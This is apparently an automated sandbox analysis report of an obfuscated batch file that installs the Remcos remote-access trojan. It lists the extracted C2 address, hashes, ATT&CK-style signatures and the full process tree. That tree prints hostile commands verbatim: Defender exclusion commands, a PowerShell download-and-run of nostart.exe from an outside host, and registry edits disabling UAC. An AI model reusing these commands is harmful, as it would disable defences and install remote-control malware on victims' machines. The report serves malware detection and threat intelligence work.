Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-11-2024 14:32
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document_obf.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
New Text Document_obf.bat
-
Size
1KB
-
MD5
4f4e694e3986ffa9959b38e093d9da44
-
SHA1
3a2670365ed398a60c5a7f86ecd8778e295e3bef
-
SHA256
0ccdb4a818091ae2e5725a7f1ba92487576df540f9f3a197fc0ae38ddda480cb
-
SHA512
7194250b629770adb40f76ba28dcdde5f0f78351623c046ee44e3a92ae0835810e391fce1b2c47f0ac0c88ba7f20742d18175e221e28f3b0e37638a787d1f4dc
Malware Config
Extracted
remcos
RemoteHost
194.59.31.143:4444
-
audio_folder
xboxGameBar
-
audio_path
%SystemDrive%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
ploi.exe
-
copy_folder
koi
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%SystemDrive%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-ZU01ZO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 4412 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5088 powershell.exe 752 powershell.exe 840 powershell.exe 4412 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1080 nostart.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1080 set thread context of 1760 1080 nostart.exe 93 PID 1760 set thread context of 5020 1760 iexplore.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nostart.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1876 reg.exe 3120 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 5088 powershell.exe 5088 powershell.exe 752 powershell.exe 752 powershell.exe 840 powershell.exe 840 powershell.exe 4412 powershell.exe 4412 powershell.exe 1080 nostart.exe 1080 nostart.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1080 nostart.exe 1760 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3868 WMIC.exe Token: SeSecurityPrivilege 3868 WMIC.exe Token: SeTakeOwnershipPrivilege 3868 WMIC.exe Token: SeLoadDriverPrivilege 3868 WMIC.exe Token: SeSystemProfilePrivilege 3868 WMIC.exe Token: SeSystemtimePrivilege 3868 WMIC.exe Token: SeProfSingleProcessPrivilege 3868 WMIC.exe Token: SeIncBasePriorityPrivilege 3868 WMIC.exe Token: SeCreatePagefilePrivilege 3868 WMIC.exe Token: SeBackupPrivilege 3868 WMIC.exe Token: SeRestorePrivilege 3868 WMIC.exe Token: SeShutdownPrivilege 3868 WMIC.exe Token: SeDebugPrivilege 3868 WMIC.exe Token: SeSystemEnvironmentPrivilege 3868 WMIC.exe Token: SeRemoteShutdownPrivilege 3868 WMIC.exe Token: SeUndockPrivilege 3868 WMIC.exe Token: SeManageVolumePrivilege 3868 WMIC.exe Token: 33 3868 WMIC.exe Token: 34 3868 WMIC.exe Token: 35 3868 WMIC.exe Token: 36 3868 WMIC.exe Token: SeIncreaseQuotaPrivilege 3868 WMIC.exe Token: SeSecurityPrivilege 3868 WMIC.exe Token: SeTakeOwnershipPrivilege 3868 WMIC.exe Token: SeLoadDriverPrivilege 3868 WMIC.exe Token: SeSystemProfilePrivilege 3868 WMIC.exe Token: SeSystemtimePrivilege 3868 WMIC.exe Token: SeProfSingleProcessPrivilege 3868 WMIC.exe Token: SeIncBasePriorityPrivilege 3868 WMIC.exe Token: SeCreatePagefilePrivilege 3868 WMIC.exe Token: SeBackupPrivilege 3868 WMIC.exe Token: SeRestorePrivilege 3868 WMIC.exe Token: SeShutdownPrivilege 3868 WMIC.exe Token: SeDebugPrivilege 3868 WMIC.exe Token: SeSystemEnvironmentPrivilege 3868 WMIC.exe Token: SeRemoteShutdownPrivilege 3868 WMIC.exe Token: SeUndockPrivilege 3868 WMIC.exe Token: SeManageVolumePrivilege 3868 WMIC.exe Token: 33 3868 WMIC.exe Token: 34 3868 WMIC.exe Token: 35 3868 WMIC.exe Token: 36 3868 WMIC.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 840 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 3180 wrote to memory of 2788 3180 cmd.exe 80 PID 3180 wrote to memory of 2788 3180 cmd.exe 80 PID 2788 wrote to memory of 3340 2788 net.exe 81 PID 2788 wrote to memory of 3340 2788 net.exe 81 PID 3180 wrote to memory of 2928 3180 cmd.exe 82 PID 3180 wrote to memory of 2928 3180 cmd.exe 82 PID 2928 wrote to memory of 3868 2928 cmd.exe 83 PID 2928 wrote to memory of 3868 2928 cmd.exe 83 PID 2928 wrote to memory of 3056 2928 cmd.exe 84 PID 2928 wrote to memory of 3056 2928 cmd.exe 84 PID 3180 wrote to memory of 5088 3180 cmd.exe 86 PID 3180 wrote to memory of 5088 3180 cmd.exe 86 PID 3180 wrote to memory of 752 3180 cmd.exe 88 PID 3180 wrote to memory of 752 3180 cmd.exe 88 PID 3180 wrote to memory of 840 3180 cmd.exe 89 PID 3180 wrote to memory of 840 3180 cmd.exe 89 PID 3180 wrote to memory of 4412 3180 cmd.exe 90 PID 3180 wrote to memory of 4412 3180 cmd.exe 90 PID 3180 wrote to memory of 1080 3180 cmd.exe 91 PID 3180 wrote to memory of 1080 3180 cmd.exe 91 PID 3180 wrote to memory of 1080 3180 cmd.exe 91 PID 1080 wrote to memory of 3080 1080 nostart.exe 92 PID 1080 wrote to memory of 3080 1080 nostart.exe 92 PID 1080 wrote to memory of 3080 1080 nostart.exe 92 PID 1080 wrote to memory of 1760 1080 nostart.exe 93 PID 1080 wrote to memory of 1760 1080 nostart.exe 93 PID 1080 wrote to memory of 1760 1080 nostart.exe 93 PID 1080 wrote to memory of 1760 1080 nostart.exe 93 PID 1760 wrote to memory of 3844 1760 iexplore.exe 95 PID 1760 wrote to memory of 3844 1760 iexplore.exe 95 PID 1760 wrote to memory of 3844 1760 iexplore.exe 95 PID 1760 wrote to memory of 5020 1760 iexplore.exe 97 PID 1760 wrote to memory of 5020 1760 iexplore.exe 97 PID 1760 wrote to memory of 5020 1760 iexplore.exe 97 PID 1760 wrote to memory of 5020 1760 iexplore.exe 97 PID 3080 wrote to memory of 1876 3080 cmd.exe 98 PID 3080 wrote to memory of 1876 3080 cmd.exe 98 PID 3080 wrote to memory of 1876 3080 cmd.exe 98 PID 3844 wrote to memory of 3120 3844 cmd.exe 99 PID 3844 wrote to memory of 3120 3844 cmd.exe 99 PID 3844 wrote to memory of 3120 3844 cmd.exe 99
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:3340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic logicaldisk get name | find ":"2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get name3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:3056
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'D:\'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'F:\'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { exit 1 }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\nostart.exe"C:\Users\Admin\AppData\Local\Temp\nostart.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1876
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3120
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵PID:5020
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD55b705b4839f481b2485f2195c589cad0
SHA1a55866cd9e6fedf352d0e937101755ea61a50c86
SHA256f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6
SHA512f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab
-
Filesize
944B
MD5a13d86aa4aa93ee4e7b6a655edf6cc79
SHA1b3172c58361cfc52fe51b7bd2971df38657e77db
SHA256d42c42ef46ed4341b7eb52572aa6c7bc7720401481c93b38d6cc7cbf00826066
SHA5126e55311ca9f9ec756eac30841c9564a679089b7a249a6d5841e97e7bc73e5dd213bd7683856b740bbae2fa46456558558f52ec78b4460ef932d363d3e7800fbf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
481KB
MD53a57301d5b27cf1ef1f634af4950f593
SHA1fd21a65c2272ef3bb05521994022e56ab017b494
SHA2568df3bcdf64bbc3752bcdc19b64fc50aaff8333c78f470e52a96001c7a7529318
SHA512d0392099fcbb5c5e50732213d666b96b5e17c7c50ddfecad35b7930111d08c3d39d067bd9774fb7a430db68f8c84d51e863ee4b39f274329d62918610093b80c